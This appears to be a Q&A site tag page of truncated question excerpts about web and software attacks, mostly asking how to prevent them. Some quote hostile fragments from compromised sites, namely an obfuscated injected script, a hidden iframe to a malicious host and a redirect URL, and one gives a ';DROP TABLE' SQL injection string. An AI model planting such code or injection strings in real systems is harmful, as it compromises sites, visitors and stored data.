attack

Protection from Format String Vulnerability

What exactly is a "Format String Vulnerability" in a Windows System, how does it work, and how can I protect against it? ...

client's website was attacked, eeek!

Well, I guess this day had to come. My client's website has been compromised and blacklisted by Google. When you load the main page this javascript gets automatically added to the bottom of the document: <script type="text/javascript">var str='google-analytics.com';var str2='6b756c6b61726e696f6f37312e636f6d';str4='php';var str3='if';st...

C# MVC: What is a good way to prevent Denial Of Service (DOS) attacks on ASP.NET sites?

I'm looking for a good and inexpensive way to prevent denial of service attacks on my ASP.NET MVC site. I've been thinking about a solution that intercepts the HttpHandler and then counts requests in the Cache object, with the key being something like "RequestCount_[IpAddressOfRequestClient]" but that seems like it would generate a cra...

iframe/script attack to website

I faced a website attack problem that some malicious javascript code added to all pages in my website. Recently I faced another problem that my website is attacked with the following "iframe" tag. iframe src="http://shopmovielife.cn:8080/index.php" width=127 height=167 style="visibility: hidden" Even if I remove this tag, the index ...

How to prevent code injection attacks in PHP?

I am a bit confused, there are so many functions in PHP, and some using this, some using that. Some people use: htmlspecialchars(), htmlentities(), strip_tags() etc. Which is the correct one and what do you guys usually use? Is this correct (advise me a better one, if any): $var = mysql_real_escape_string(htmlentities($_POST['username'...

Common Website Attack Methods, Detection, and Recovery

I've seen a lot of questions here about specific types of attacks against websites, including SQL injection, denial-of-service, and cross-site scripting. I would like to get a list of the common types of attacks against web sites/services, how to prevent them, how to know if you've been attacked, and how to recover from an attack, all...

I'm being attacked - what can I do?

Someone is putting this code onto my aspx page. What are they doing? How are they doing it? How do I stop them? It's on a shared hosting server. It's on an aspx content page which has a master page and is after the </asp:content> tag... <div style="display:none">qzfmjsdbknmrmlkszrrcehikeapphqq</div> <div style="display:none">o...

Reflection attacks in Auth protocol

Hi all, I have come across a theory on Auth protocol hacking vulnerability which can be found in http://www.owasp.org/index.php/Reflection_attack_in_an_auth_protocol. I understand how this vulnerability causes problems in exchanging the messages and how to bypass validation to become a logged-in and to be a valid user. The following co...

How do I avoid reflection injection attacks in PHP?

I'm writing a class that allows you to bridge HTTP requests with class instances using JSON for data, without any implementation in the class you're bridging to. Basically this is how it works: // This is just an ordinary class. $service = new WeatherService(); $jhi = new JsonHttpInterface($service); $jhi->exec(); The JsonHttpInterfa...

how the code attack google works?

According to McAfee “Aurora” Exploit In Google Attack Now Public, and the exploit code referred should be here, can anyone give a more detailed explanation of how it works? ...

Can someone explain last year's reddit exploit to me?

Last year a user managed to inject arbitrary javascript into reddit's markdown syntax. Can someone explain how this was done and how I can test whether my site is similarly vulnerable? ...

Ruby on Rails Mysterious Javascript Alert box with cookie information

I have a problem in a Ruby on Rails app that I am working on. I have been working on the app for months and I have never had this problem before and after a bit of Google searches I think that somehow someone is trying to steal cookies with javascript. When I click on the link I get an alert box titled "the page at www.napkinboard.com s...

Does converting input from HTML forms into htmlentities protect against attacks involving JavaScript insertion?

Hi everyone, I was wondering if converting POST input from an HTML form into html entities, (via the PHP function htmlentities() or using the FILTER_SANITIZE_SPECIAL_CHARS constant in tandem with the filter_input() PHP function ), will help defend against any attacks where a user attempts to insert any JavaScript code inside the form fi...

Meet-in-the-Middle Attack on an NTRU Private key

Hello everyone. I was wondering if anyone could tell me how to represent the enumeration of vectors of private key f in a Meet-In-the-Middle Attack on an NTRU Private key. I cannot understand the example given here http://securityinnovation.com/cryptolab/pdf/NTRUTech004v2.pdf I'll be very thankful if anyone could show an example in det...

PHP: I got hacked...

I just checked my site it suddenly jumps me to this site: xxxp://www1.re*******3.net/?p=p52dcWpkbG6HjsbIo216h3de0KCfaFbVoKDb2YmHWJjOxaCbkXp%2FWqyopHaYXsiaY2eRaGNpnFPVpJHaotahiaJ0WKrO1c%2Beb1qfnaSZdV%2FXlsndblaWpG9plmGQYWCcW5eakWppWKjKx6ChpqipbmdjpKjEjtDOoKOhY56n1pLWn1%2FZodXN02BdpqmikpVwZWpxZGxpcV%2FVoJajYmJkZ2hwlGGXaVbJkKC0q1eum5qimZxx...

What is ClixSmart+ServiceMonitor from my IIS log?

(Cross post from serverfault) Hi, Our IIS6 log (W3SVC1) is showing entries with suffix ClixSmart+ServiceMonitor 200 0 0. There are over 10 of them per second and it lasts about 20 seconds when happened. Is our server being hacked? TIA ...

Is this query safe from sql injection?

The script is in PHP and as DB I use MySQL. Here is the script itself. $unsafe_variable = $_GET["user-input"]; $sql=sprintf("INSERT INTO table (column) VALUES('%s')",$unsafe_variable); mysql_query($sql); Some people say that if user assigns ;DROP TABLE blah; string to the variable $unsafe_variable it deletes the table. But I tried th...

Is it possible to distinguish from "good" http requests and DoS attacks?

How could I know that a lot of requests in a short period of time come from a DoS attack and not from normal browser requests? ...

how to avoid bot attacks on form

I have these forms: https://www.mychabad.org/templates/articlecco.asp?aid=1188756&jewish=General-Contributions.htm&lang=en&site=chabaduc.org https://www.mychabad.org/templates/articlecco.asp?AID=1189379 https://www.mychabad.org/templates/articlecco.asp?aid=1189287&jewish=Shabbat-Holiday-Sponsorships.htm&lang=en&amp...

Introduction to various Attack types

I just read a paper on preventing buffer overflow attacks and in that vein, I am looking for a paper or set of papers that will explain the various types of attacks that programmers and sysadmins have to worry about. Can anyone help? Even keywords to search ACM under. ...